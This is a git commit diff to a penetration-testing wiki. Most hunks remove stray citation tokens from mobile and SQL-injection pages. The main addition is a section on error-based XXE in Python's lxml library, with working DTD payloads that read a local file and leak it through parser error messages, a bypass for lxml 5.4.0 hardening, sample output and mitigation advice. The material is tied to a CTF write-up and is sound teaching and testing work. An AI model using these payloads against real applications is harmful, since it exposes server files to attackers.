Add content from: Dojo CTF Challenge #42: Hex Color Palette XXE File Disclosur...

2025-10-10 18:36:50 +00:00 · 2025-07-11 18:37:22 +00:00 · 2025-07-11 18:37:22 +00:00 · fd1ef02762
commit fd1ef02762
parent b5fa7686cd
4 changed files with 74 additions and 7 deletions
--- a/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
+++ b/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
@ -61,7 +61,7 @@ Java.perform(function () {
  });
 });
 ```
-Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) as long as you use frida-server 16.2 or later – earlier versions failed to locate padding for inline hooks.  citeturn5search2turn5search0
+Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) as long as you use frida-server 16.2 or later – earlier versions failed to locate padding for inline hooks.  

 ---

@ -69,7 +69,7 @@ Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+)

 | Year | CVE | Affected library | Notes |
 |------|-----|------------------|-------|
-|2023|CVE-2023-4863|`libwebp` ≤ 1.3.1|Heap buffer overflow reachable from native code that decodes WebP images. Several Android apps bundle vulnerable versions. When you see a `libwebp.so` inside an APK, check its version and attempt exploitation or patching.| citeturn2search0|
+|2023|CVE-2023-4863|`libwebp` ≤ 1.3.1|Heap buffer overflow reachable from native code that decodes WebP images. Several Android apps bundle vulnerable versions. When you see a `libwebp.so` inside an APK, check its version and attempt exploitation or patching.| |
 |2024|Multiple|OpenSSL 3.x series|Several memory-safety and padding-oracle issues. Many Flutter & ReactNative bundles ship their own `libcrypto.so`.|

 When you spot *third-party* `.so` files inside an APK, always cross-check their hash against upstream advisories. SCA (Software Composition Analysis) is uncommon on mobile, so outdated vulnerable builds are rampant.
@ -92,7 +92,7 @@ When you spot *third-party* `.so` files inside an APK, always cross-check their

 ### References

- Frida 16.x change-log (Android hooking, tiny-function relocation) – [frida.re/news](https://frida.re/news/)  citeturn5search0
- NVD advisory for `libwebp` overflow CVE-2023-4863 – [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2023-4863) citeturn2search0
+- Frida 16.x change-log (Android hooking, tiny-function relocation) – [frida.re/news](https://frida.re/news/)  
+- NVD advisory for `libwebp` overflow CVE-2023-4863 – [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2023-4863) 

 {{#include ../../banners/hacktricks-training.md}}
--- a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
+++ b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
@ -106,7 +106,7 @@ Recent Frida releases (>=16) automatically handle pointer authentication and oth

 ### Automated dynamic analysis with MobSF (no jailbreak)

-[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【turn6view0†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
+[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:

 ```bash
 docker pull opensecurity/mobile-security-framework-mobsf:latest
--- a/src/pentesting-web/sql-injection/ms-access-sql-injection.md
+++ b/src/pentesting-web/sql-injection/ms-access-sql-injection.md
@ -141,7 +141,7 @@ Point the UNC path to:
 * a host that drops the TCP handshake after `SYN-ACK`
 * a firewall sinkhole

-The extra seconds introduced by the remote lookup can be used as an **out-of-band timing oracle** for boolean conditions (e.g. pick a slow path only when the injected predicate is true). Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984. citeturn1search0
+The extra seconds introduced by the remote lookup can be used as an **out-of-band timing oracle** for boolean conditions (e.g. pick a slow path only when the injected predicate is true). Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984. 

 ### Other Interesting functions

@ -229,7 +229,7 @@ Mitigations (recommended even for legacy Classic ASP apps):
 * Block outbound SMB/WebDAV at the network boundary.
 * Sanitize / parameterise any part of a query that may end up inside an `IN` clause.

-The forced-authentication vector was revisited by Check Point Research in 2023, proving it is still exploitable on fully patched Windows Server when the registry key is absent. citeturn0search0
+The forced-authentication vector was revisited by Check Point Research in 2023, proving it is still exploitable on fully patched Windows Server when the registry key is absent. 

 ### .mdb Password Cracker

--- a/src/pentesting-web/xxe-xee-xml-external-entity.md
+++ b/src/pentesting-web/xxe-xee-xml-external-entity.md
@ -1,5 +1,10 @@
 # XXE - XEE - XML External Entity

+{{#include /banners/hacktricks-training.md}}
+
+- [Dojo CTF Challenge #42 – Hex Color Palette XXE write-up](https://www.yeswehack.com/dojo/dojo-ctf-challenge-winners-42)
+- [lxml bug #2107279 – Parameter-entity XXE still possible](https://bugs.launchpad.net/lxml/+bug/2107279)
+
 {{#include ../banners/hacktricks-training.md}}

 ## XML Basics
@ -773,6 +778,65 @@ Take a look to this amazing report [https://swarm.ptsecurity.com/impossible-xxe-
 https://github.com/luisfontes19/xxexploiter
 {{#endref}}

+### Python lxml Parameter-Entity XXE (Error-Based File Disclosure)
+
+> [!INFO]
+> The Python library **lxml** uses **libxml2** under the hood.  Versions prior to **lxml 5.4.0 / libxml2 2.13.8** still expand *parameter* entities even when `resolve_entities=False`, making them reachable when the application enables `load_dtd=True` and/or `resolve_entities=True`.  This allows Error-Based XXE payloads that embed the contents of local files into the parser error message.
+
+#### 1. Exploiting lxml < 5.4.0
+1. Identify or create a *local* DTD on disk that defines an **undefined** parameter entity (e.g. `%config_hex;`).
+2. Craft an internal DTD that:
+   * Loads the local DTD with `<!ENTITY % local_dtd SYSTEM "file:///tmp/xml/config.dtd">`.
+   * Redefines the undefined entity so that it:
+     - Reads the target file (`<!ENTITY % flag SYSTEM "file:///tmp/flag.txt">`).
+     - Builds another parameter entity that refers to an **invalid path** containing the `%flag;` value and triggers a parser error (`<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///aaa/%flag;'>">`).
+3. Finally expand `%local_dtd;` and `%eval;` so that the parser encounters `%error;`, fails to open `/aaa/<FLAG>` and leaks the flag inside the thrown exception – which is often returned to the user by the application.
+
+```xml
+<!DOCTYPE colors [
+  <!ENTITY % local_dtd SYSTEM "file:///tmp/xml/config.dtd">
+  <!ENTITY % config_hex '
+    <!ENTITY % flag SYSTEM "file:///tmp/flag.txt">
+    <!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///aaa/%flag;'>">
+  %eval;'>
+  %local_dtd;
+]>
+```
+When the application prints the exception the response contains:
+```
+Error : failed to load external entity "file:///aaa/FLAG{secret}"
+```
+
+> [!TIP]
+> If the parser complains about `%`/`&` characters inside the internal subset, double-encode them (`&#x26;#x25;` ⇒ `%`) to delay expansion.
+
+#### 2. Bypassing the lxml 5.4.0 hardening (libxml2 still vulnerable)
+`lxml` ≥ 5.4.0 forbids *error* parameter entities like the one above, but **libxml2** still allows them to be embedded in a *general* entity.  The trick is to:
+1. Read the file into a parameter entity `%file`.
+2. Declare another parameter entity that builds a **general** entity `c` whose SYSTEM identifier uses a *non-existent protocol* such as `meow://%file;`.
+3. Place `&c;` in the XML body.  When the parser tries to dereference `meow://…` it fails and reflects the full URI – including the file contents – in the error message.
+
+```xml
+<!DOCTYPE colors [
+  <!ENTITY % a '
+    <!ENTITY % file SYSTEM "file:///tmp/flag.txt">
+    <!ENTITY % b "<!ENTITY c SYSTEM 'meow://%file;'>">
+  '>
+  %a; %b;
+]>
+<colors>&c;</colors>
+```
+
+#### Key takeaways
+* **Parameter entities** are still expanded by libxml2 even when `resolve_entities` should block XXE.
+* An **invalid URI** or **non-existent file** is enough to concatenate controlled data into the thrown exception.
+* The technique works **without outbound connectivity**, making it ideal for strictly egress-filtered environments.
+
+#### Mitigation guidance
+* Upgrade to **lxml ≥ 5.4.0** and ensure the underlying **libxml2** is **≥ 2.13.8**.
+* Disable `load_dtd` and/or `resolve_entities` unless absolutely required.
+* Avoid returning raw parser errors to the client.
+
 ## References

 - [https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf](https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf)
@ -784,4 +848,7 @@ https://github.com/luisfontes19/xxexploiter
 - [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe)
 - [https://gosecure.github.io/xxe-workshop/#7](https://gosecure.github.io/xxe-workshop/#7)

+- [Dojo CTF Challenge #42 – Hex Color Palette XXE write-up](https://www.yeswehack.com/dojo/dojo-ctf-challenge-winners-42)
+- [lxml bug #2107279 – Parameter-entity XXE still possible](https://bugs.launchpad.net/lxml/+bug/2107279)
+
 {{#include ../banners/hacktricks-training.md}}